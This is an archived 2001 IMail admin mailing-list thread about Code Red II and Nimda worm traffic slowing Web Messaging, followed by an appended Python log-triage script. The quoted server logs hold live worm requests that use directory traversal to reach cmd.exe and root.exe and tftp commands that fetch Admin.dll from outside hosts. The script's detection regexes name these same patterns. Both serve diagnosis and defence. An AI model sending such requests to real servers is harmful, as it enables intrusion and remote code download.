Scot,
I solved this problem by calling my upstream provider. I let them know that
I was being DoS'ed and we came up with a solution to block all of those
requests right at the border router for our subnets. This way not only
do they not make it to my machines, they don't make it through my pipe at all
and my bandwidth stays mine. I believe all upstream providers will be
willing to do it.
good luck
Todd
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Scot Desort
Sent: Friday, September 21, 2001 11:13 AM
To: [EMAIL PROTECTED]
Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!
Charles:
Some ideas:
1. Can you temporarily run web messaging on a different port number, like 81
or 8383? It may be an inconvenience to inform your users, but the effect of
the attacks would stop instantly as the Code Red I/II/Nimda requests come in
on port 80, which would no longer be running on your server.
2. Install something like BlackIce on the server. BlackIce will pick up
these requests and block them from reaching the server, leaving your
WebMessaging to run and process normal port 80 requests without the load of
the attack requests.
Good luck
--
Scot
----- Original Message -----
From: "Charles Short" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 21, 2001 10:29 AM
Subject: [imail] DoS Attack on IMail Web Messaging?? HELP!
Hello,
I know this message is long, but I called Ipswitch Support twice on
Wednesday about a problem I am having with my IMail Server and the phone
support I have gotten has not addressed my issue here and I need all the
help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I
am only running IMail on this machine. No IIS or other server programs.
We started seeing problems on Tuesday like everyone else, but we are
running IMail on a server by itself... No IIS. I am seeing a lot of
malformed header requests in the logs like the Code Red I & II virus does to
IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool
directory that are most definitely being caused by people browsing WebMail.
It is causing web messaging to crawl, but other than that I have not seen
what everyone else seems to be seeing with the Nimda virus. No other
characteristics of the Nimda virus at all. I honestly do not believe that we
have been infected...
Here is a snippet from the logs...
------------------------------
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
20010918 111401 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0
20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
20010918 111401 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
20010918 111402 205.218.55.2, , , GET /scripts/Admin.dll HTTP/1.0
20010918 111402 208.168.64.117, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.64.117%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
20010918 111402 208.27.235.69, , , GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.27.235.69%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
20010918 111402 205.197.162.130, , , GET /MSADC/root.exe?/c+tftp%20-i%20205.197.162.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
20010918 111402 208.177.252.132, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.177.252.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111402 208.234.121.72, , , GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20010918 111402 208.168.171.3, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.171.12%20GET%20Admin.dll%20Admin.dll HTTP/1.0
------------------------------
When I called the other day the assumption was that it was the Nimda virus
and the Ipswitch support guys said to run a virus program and reload the web
template files to fix it and that has done nothing at all to help. I even
went ahead and made the upgrade from 6.06 to v.7.03 Wednesday night and no
progress. I have all of the virus definitions for Norton and I've done
SEVERAL system scans with Norton, House Call and the FIX_NIMDA.EXE program
from Trend Micro and all came up empty handed. I just can't believe that the
Nimda has gotten into our system... Is anyone else seeing these BRO*.tmp
files or is it just me?
This seems to be a problem specific to IMail's Web Messaging program not
properly filtering out these malformed requests. When Web Messaging is off,
the server runs like a dream. It is one thing to patch an IIS server with a
patch from the product vendor, but I honestly don't have a clue as to what
else I can do to stop this DoS attack from happening on my IMail box without
implementing a firewall system for that server. I am seeing a ton of
incoming traffic in our T1 logs so I know that it is coming in from the
outside, but what I need to know is what can I do to make IMail filter out
these requests? Help please.
Charles Short
[EMAIL PROTECTED]
Systems Administrator
Orotech
Web Services
http://www.orotech.net
910.350.7980 voice
910.350.7976 fax
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
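Added example, not code from the thread or from Ipswitch: a small Python triage script for Web Messaging logs in the layout Charles quotes above. It parses each line, flags the Code Red II / Nimda probe signatures visible in his snippet, and counts hits per source address, which is the kind of list Todd's upstream provider would need in order to block the traffic at the border router. The line layout and the signature list are assumptions taken from the snippet; the last sample line is constructed.

```python
import re
from collections import Counter

# Log layout as quoted in Charles's message: "YYYYMMDD HHMMSS client-ip, , , METHOD path HTTP/x.y".
LINE_RE = re.compile(r"^(\d{8}) (\d{6}) ([\d.]+), , , (\S+) (\S+) (HTTP/[\d.]+)$")

# Request-path fragments characteristic of the Code Red II / Nimda probes shown in the thread.
WORM_SIGNATURES = [
    r"/root\.exe",                # Code Red II backdoor copy of cmd.exe
    r"/winnt/system32/cmd\.exe",  # cmd.exe reached through a drive-letter virtual directory
    r"admin\.dll",                # Nimda payload fetched over tftp
    r"%255c|\.\./",               # double-encoded or plain directory traversal
    r"tftp%20-i%20",              # "tftp -i <ip> GET ..." download command in the query string
]
WORM_RE = re.compile("|".join(WORM_SIGNATURES), re.IGNORECASE)

def parse_line(line):
    """Return a dict for a well-formed log line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    return dict(zip(("date", "time", "ip", "method", "path", "proto"), m.groups())) if m else None

def is_worm_probe(path):
    """True when the request path matches one of the worm probe signatures."""
    return WORM_RE.search(path) is not None

def summarize(log_text):
    """Count probe hits per source IP and collect the remaining (normal) requests."""
    probes, normal = Counter(), []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # blank or unparseable line, e.g. the "------" separators
        if is_worm_probe(rec["path"]):
            probes[rec["ip"]] += 1
        else:
            normal.append(rec)
    return probes, normal

# Sample input: four lines copied from the thread's snippet plus one constructed benign request (192.0.2.10, documentation range).
SAMPLE_LOG = """\
20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
20010918 111402 208.27.235.69, , , GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.27.235.69%20GET%20Admin.dll%20e:\\Admin.dll HTTP/1.0
20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
20010918 111402 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0
20010918 111403 192.0.2.10, , , GET /mailbox.html HTTP/1.0
"""

if __name__ == "__main__":
    probes, normal = summarize(SAMPLE_LOG)
    print(dict(probes), f"{len(normal)} normal request(s) still reach Web Messaging")
```

The per-address counts are only a starting point: the worm spreads from many infected hosts, so a per-path filter in front of the server (as Scot suggests) or an upstream block (as Todd did) is what actually keeps the load off the T1.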